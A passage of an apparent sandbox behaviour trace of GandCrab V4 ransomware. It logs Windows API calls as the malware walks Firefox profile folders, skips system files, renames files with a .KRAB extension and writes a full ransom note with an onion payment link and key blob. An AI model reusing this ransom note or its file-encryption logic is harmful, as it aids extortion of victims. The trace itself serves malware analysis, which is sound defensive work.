DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0080.677] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0080.698] CloseHandle (hObject=0x7ec) returned 1 [0080.698] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.699] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.699] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1b, wMilliseconds=0x385)) [0080.699] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.699] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.699] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.699] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock") returned 107 [0080.700] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0080.700] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.700] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.701] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\") returned 84 [0080.701] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*" [0080.701] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x1023cb8 [0080.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.701] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.701] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.701] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.701] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.701] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.701] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0080.701] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock" [0080.701] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.701] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 112 [0080.701] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a08d2ca4dee3d.lock") returned 107 [0080.701] lstrlenW (lpString=".lock") returned 5 [0080.701] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.702] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.702] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.702] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.702] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.702] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.702] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.702] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\KRAB-DECRYPT.txt" [0080.702] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.703] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\KRAB-DECRYPT.txt.KRAB") returned 105 [0080.703] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\KRAB-DECRYPT.txt") returned 100 [0080.703] lstrlenW (lpString=".txt") returned 4 [0080.703] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.703] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.703] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.703] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\KRAB-DECRYPT.txt") returned 100 [0080.703] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\KRAB-DECRYPT.txt") returned 100 [0080.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.703] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.704] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.704] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.704] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.704] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.704] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.704] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.704] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.704] lstrcmpW (lpString1="WINNT_x86-msvc", lpString2=".") returned 1 [0080.704] lstrcmpW (lpString1="WINNT_x86-msvc", lpString2="..") returned 1 [0080.704] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="WINNT_x86-msvc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc" [0080.704] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\" [0080.704] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0080.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.704] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.704] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.705] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.705] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\\\KRAB-DECRYPT.txt") returned 116 [0080.705] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\winnt_x86-msvc\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0080.706] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0080.706] WriteFile (in: hFile=0x720, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0080.707] CloseHandle (hObject=0x720) returned 1 [0080.707] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.707] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.708] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1b, wMilliseconds=0x385)) [0080.708] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.708] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.708] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.708] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a08d2ca4dee3d.lock") returned 122 [0080.708] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\winnt_x86-msvc\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x720 [0080.709] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.709] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.710] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\") returned 99 [0080.710] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*" [0080.710] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x1023df8 [0080.710] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.710] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.710] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.710] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.710] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.710] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.710] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0080.710] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a08d2ca4dee3d.lock" [0080.710] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.710] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 127 [0080.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\d2ca4a08d2ca4dee3d.lock") returned 122 [0080.711] lstrlenW (lpString=".lock") returned 5 [0080.711] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.711] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.711] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.711] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.711] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.711] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.712] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.712] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\KRAB-DECRYPT.txt" [0080.712] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.712] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\KRAB-DECRYPT.txt.KRAB") returned 120 [0080.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\KRAB-DECRYPT.txt") returned 115 [0080.712] lstrlenW (lpString=".txt") returned 4 [0080.712] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.712] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.712] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\KRAB-DECRYPT.txt") returned 115 [0080.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\KRAB-DECRYPT.txt") returned 115 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.713] lstrcmpiW 